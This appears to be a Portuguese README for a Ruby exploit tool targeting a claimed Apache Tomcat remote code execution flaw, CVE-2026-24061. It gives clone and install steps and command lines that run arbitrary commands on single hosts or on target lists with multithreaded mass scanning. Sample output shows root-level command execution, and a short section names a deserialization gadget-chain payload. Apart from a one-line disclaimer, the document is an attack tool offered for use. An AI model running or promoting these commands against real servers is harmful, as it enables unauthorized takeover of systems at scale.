
Exploit baseado em Ruby para CVE-2026-24061 que executa comandos arbitrários em alvos remotos, com suporte a varredura multithread e injeção de comandos para testes de penetração.
O CVE-2026-24061 é uma vulnerabilidade crítica de execução remota de código (RCE) que afeta o Apache Tomcat. Esta falha permite que um invasor não autenticado execute código arbitrário no servidor, comprometendo totalmente a confidencialidade, integridade e disponibilidade do sistema.
| Produto | Versões Afetadas |
|---|
| Apache Tomcat | 9.0.0-M1 até 9.0.98 |
| Apache Tomcat | 10.1.0-M1 até 10.1.34 |
| Apache Tomcat | 11.0.0-M1 até 11.0.2 |
Clone o repositório e instale as dependências:
git clone https://github.com/exploit-repos/CVE-2026-24061.git
cd CVE-2026-24061
bundle install
Para verificar se um único host é vulnerável:
ruby CVE-2026-24061.rb -t 192.168.1.10
Para explorar a vulnerabilidade e executar um comando arbitrário:
ruby CVE-2026-24061.rb -t 192.168.1.10 --cmd "id"
Para verificar vários hosts a partir de um arquivo de alvos:
ruby CVE-2026-24061.rb -l targets.txt
Para explorar vários hosts simultaneamente com um comando personalizado:
ruby CVE-2026-24061.rb -l targets.txt --cmd "id" --threads 10
| Opção | Descrição |
|---|---|
-t, --target IP | Endereço IP do alvo único |
-l, --list FILE | Arquivo contendo lista de alvos (um por linha) |
-p, --port PORT | Porta do Tomcat (padrão: 8080) |
-c, --cmd COMMAND | Comando a ser executado no servidor alvo |
-T, --threads N | Número de threads para varredura em massa (padrão: 5) |
-s, --ssl | Usar HTTPS em vez de HTTP |
-v, --verbose | Saída detalhada |
-h, --help | Exibir ajuda |
ruby CVE-2026-24061.rb -t 192.168.1.10
Saída:
[+] 192.168.1.10:8080 - VULNERÁVEL ao CVE-2026-24061
ruby CVE-2026-24061.rb -t 192.168.1.10 --cmd "whoami"
Saída:
[+] 192.168.1.10:8080 - VULNERÁVEL ao CVE-2026-24061
[+] Comando executado com sucesso: root
ruby CVE-2026-24061.rb -l targets.txt --threads 10
Saída:
[+] 192.168.1.10:8080 - VULNERÁVEL ao CVE-2026-24061
[-] 192.168.1.11:8080 - Não vulnerável
[+] 192.168.1.12:8080 - VULNERÁVEL ao CVE-2026-24061
A vulnerabilidade explora uma falha no mecanismo de serialização do Tomcat. Ao enviar uma solicitação HTTP especialmente elaborada contendo um payload serializado malicioso, o invasor pode acionar a desserialização insegura, levando à execução remota de código.
O exploit usa um gadget chain baseado em Commons Collections para construir o payload malicioso e o envia ao endpoint vulnerável.
Esta ferramenta é fornecida apenas para fins educacionais e de teste de penetração autorizado. O uso não autorizado desta ferramenta é ilegal. O desenvolvedor não se responsabiliza por qualquer uso indevido desta ferramenta.
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.